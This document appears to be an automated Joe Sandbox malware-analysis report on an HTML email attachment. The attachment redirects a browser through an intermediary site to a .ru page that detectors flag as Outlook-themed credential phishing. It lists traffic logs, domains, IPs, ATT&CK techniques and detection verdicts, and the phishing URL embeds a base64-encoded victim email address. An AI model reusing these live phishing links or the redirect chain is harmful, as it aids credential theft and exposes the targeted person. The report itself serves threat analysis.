Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.outlook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://d7m.kczcylvjubu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /memxymqebyrphctIBZHJHNAERMLGRRBXYGBJYSLXWCZFEWUYNPCWIYKNBXJXVZDLWGCXYJHQHADKEVP HTTP/1.1Host: yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: outlook.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://d7m.kczcylvjubu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /owa/ HTTP/1.1Host: outlook.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://d7m.kczcylvjubu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: paterbrothers.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: d7m.kczcylvjubu.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru
Source: global trafficDNS traffic detected: DNS query: www.outlook.com
Source: global trafficDNS traffic detected: DNS query: outlook.live.com
Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1795432094:1734556335:322H1YIrQj2slam4FeODcquin5MQ5gHchmAe7PwBA_Y/8f4285124e7ede94/8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3264sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vdsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 22:16:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 4815Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MB3F5GHFjzAhajA8l0JYFrdxsEAOEt3MmpxMup5%2Bievq6zfaIrqqtP72Lb2QvwCX9hslIvT5Mwadu8SkE7kordM31A2eRp3yaKTFZcGw7IXRF2hO%2FSMRkm%2BWfLq6sA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4320&min_rtt=4316&rtt_var=1628&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2254&delivery_rate=653960&cwnd=243&unsent_bytes=0&cid=e70dbe91b2cb9118&ts=26&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8f428522ade842e8-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1831&min_rtt=1829&rtt_var=690&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1901&delivery_rate=1580942&cwnd=250&unsent_bytes=0&cid=bdca26dca3f47d90&ts=9839&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 22:16:59 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: hJVkZ4JBxNEuENGkfPY8LeRPUzKSAd0aFSw=$IH68yVBnai7eIVDgServer: cloudflareCF-RAY: 8f42853b88ac0f53-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 22:17:05 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: MFicOD3N/tv3xUoq+9R5qAC++ihtJJGSOAo=$64FTDPz2qojV3Xf0cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f42856388e7420b-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 22:17:13 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 9Cx5wpv4zJNgIgyIjLpOTerNmnFE5hUKvE0=$7HQfbm2bXO+1gzpHcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f4285932857424d-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_115.2.dr, chromecache_101.2.drString found in binary or memory: http://github.com/requirejs/almond/LICENSE
Source: chromecache_106.2.drString found in binary or memory: http://schema.org/Organization
Source: chromecache_106.2.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: chromecache_106.2.drString found in binary or memory: https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.c
Source: chromecache_106.2.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: chromecache_117.2.dr, chromecache_99.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_106.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: chromecache_106.2.drString found in binary or memory: https://onedrive.live.com/about/en-us/
Source: chromecache_106.2.drString found in binary or memory: https://outlook.live.com/owa/
Source: chromecache_106.2.drString found in binary or memory: https://products.office.com/en-us/home
Source: chromecache_106.2.drString found in binary or memory: https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeams
Source: chromecache_106.2.drString found in binary or memory: https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
Source: chromecache_106.2.drString found in binary or memory: https://www.onenote.com/
Source: chromecache_106.2.drString found in binary or memory: https://www.skype.com/en/
Source: chromecache_106.2.drString found in binary or memory: https://www.xbox.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: classification engineClassification label: mal64.phis.evad.winHTML@29/51@44/15
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\vRecord__0064secs__warriorsheart.com.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2580 --field-trial-handle=2540,i,15348211205700614738,394696290099158422,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2580 --field-trial-handle=2540,i,15348211205700614738,394696290099158422,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://d7m.kczcylvjubu.ru/xJEob3V/#G#bWljaGVsbGUuYXhtYWtlckB3YXJyaW9yc2hlYXJ0LmNvbQ==HTTP Parser: https://d7m.kczcylvjubu.ru/xJEob3V/#G#bWljaGVsbGUuYXhtYWtlckB3YXJyaW9yc2hlYXJ0LmNvbQ==
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
Boot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://d7m.kczcylvjubu.ru/xJEob3V/#G#bWljaGVsbGUuYXhtYWtlckB3YXJyaW9yc2hlYXJ0LmNvbQ==100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://d7m.kczcylvjubu.ru/favicon.ico100%Avira URL Cloudphishing
https://yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru/memxymqebyrphctIBZHJHNAERMLGRRBXYGBJYSLXWCZFEWUYNPCWIYKNBXJXVZDLWGCXYJHQHADKEVP100%Avira URL Cloudmalware
https://paterbrothers.com/res444.php?2-68747470733a2f2f44374d2e6b637a63796c766a7562752e72752f784a456f6233562f-butterbur0%Avira URL Cloudsafe
file:///C:/Users/user/Desktop/vRecord__0064secs__warriorsheart.com.html0%Avira URL Cloudsafe
https://d7m.kczcylvjubu.ru/xJEob3V/100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
ooc-g2.tm-4.office.com
40.99.70.226
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      paterbrothers.com
      69.49.245.172
      truetrue
        unknown
        code.jquery.com
        151.101.130.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            high
            d7m.kczcylvjubu.ru
            104.21.78.181
            truetrue
              unknown
              challenges.cloudflare.com
              104.18.94.41
              truefalse
                high
                www.google.com
                142.250.181.132
                truefalse
                  high
                  yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru
                  104.21.18.132
                  truefalse
                    unknown
                    olc-g2.tm-4.office.com
                    40.99.32.114
                    truefalse
                      high
                      outlook.live.com
                      unknown
                      unknownfalse
                        high
                        assets.onestore.ms
                        unknown
                        unknownfalse
                          high
                          ajax.aspnetcdn.com
                          unknown
                          unknownfalse
                            high
                            c.s-microsoft.com
                            unknown
                            unknownfalse
                              high
                              www.outlook.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://outlook.live.com/owa/false
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f4285124e7ede94/1734560216957/tPFTqUIKTrQaUVsfalse
                                    high
                                    https://paterbrothers.com/res444.php?2-68747470733a2f2f44374d2e6b637a63796c766a7562752e72752f784a456f6233562f-butterburfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                      high
                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                        high
                                        https://d7m.kczcylvjubu.ru/xJEob3V/true
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f4285124e7ede94&lang=autofalse
                                          high
                                          file:///C:/Users/user/Desktop/vRecord__0064secs__warriorsheart.com.htmltrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f4285124e7ede94/1734560216958/0e5d024cec808bfbcf86376e9ceaa57ac340fc44d57c7e7275e86b26749de3f8/PF-ArXgsbeKP5qcfalse
                                            high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1795432094:1734556335:322H1YIrQj2slam4FeODcquin5MQ5gHchmAe7PwBA_Y/8f4285124e7ede94/8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vdfalse
                                              high
                                              https://a.nel.cloudflare.com/report/v4?s=MB3F5GHFjzAhajA8l0JYFrdxsEAOEt3MmpxMup5%2Bievq6zfaIrqqtP72Lb2QvwCX9hslIvT5Mwadu8SkE7kordM31A2eRp3yaKTFZcGw7IXRF2hO%2FSMRkm%2BWfLq6sA%3D%3Dfalse
                                                high
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                  high
                                                  https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                                    high
                                                    https://d7m.kczcylvjubu.ru/xJEob3V/#G#bWljaGVsbGUuYXhtYWtlckB3YXJyaW9yc2hlYXJ0LmNvbQ==true
                                                    • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                                    unknown
                                                    https://yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru/memxymqebyrphctIBZHJHNAERMLGRRBXYGBJYSLXWCZFEWUYNPCWIYKNBXJXVZDLWGCXYJHQHADKEVPfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/false
                                                      high
                                                      https://d7m.kczcylvjubu.ru/favicon.icofalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://outlook.live.com/false
                                                        high
                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                                          high
                                                          https://www.outlook.com/false
                                                            high
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://www.skype.com/en/chromecache_106.2.drfalse
                                                              high
                                                              https://products.office.com/en-us/homechromecache_106.2.drfalse
                                                                high
                                                                https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.cchromecache_106.2.drfalse
                                                                  high
                                                                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jschromecache_106.2.drfalse
                                                                    high
                                                                    https://onedrive.live.com/about/en-us/chromecache_106.2.drfalse
                                                                      high
                                                                      https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeamschromecache_106.2.drfalse
                                                                        high
                                                                        https://www.onenote.com/chromecache_106.2.drfalse
                                                                          high
                                                                          https://www.xbox.com/chromecache_106.2.drfalse
                                                                            high
                                                                            http://schema.org/Organizationchromecache_106.2.drfalse
                                                                              high
                                                                              http://github.com/requirejs/almond/LICENSEchromecache_115.2.dr, chromecache_101.2.drfalse
                                                                                high
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                40.99.70.226
                                                                                ooc-g2.tm-4.office.comUnited States
                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                104.18.94.41
                                                                                challenges.cloudflare.comUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                142.250.181.132
                                                                                www.google.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                151.101.130.137
                                                                                code.jquery.comUnited States
                                                                                54113FASTLYUSfalse
                                                                                104.21.78.181
                                                                                d7m.kczcylvjubu.ruUnited States
                                                                                13335CLOUDFLARENETUStrue
                                                                                151.101.194.137
                                                                                unknownUnited States
                                                                                54113FASTLYUSfalse
                                                                                35.190.80.1
                                                                                a.nel.cloudflare.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                104.17.24.14
                                                                                cdnjs.cloudflare.comUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                40.99.32.114
                                                                                olc-g2.tm-4.office.comUnited States
                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                69.49.245.172
                                                                                paterbrothers.comUnited States
                                                                                46606UNIFIEDLAYER-AS-1UStrue
                                                                                104.18.95.41
                                                                                unknownUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                239.255.255.250
                                                                                unknownReserved
                                                                                unknownunknownfalse
                                                                                104.21.18.132
                                                                                yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ruUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                104.17.25.14
                                                                                unknownUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                IP
                                                                                192.168.2.4
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1577966
                                                                                Start date and time:2024-12-18 23:15:43 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 5m 38s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:7
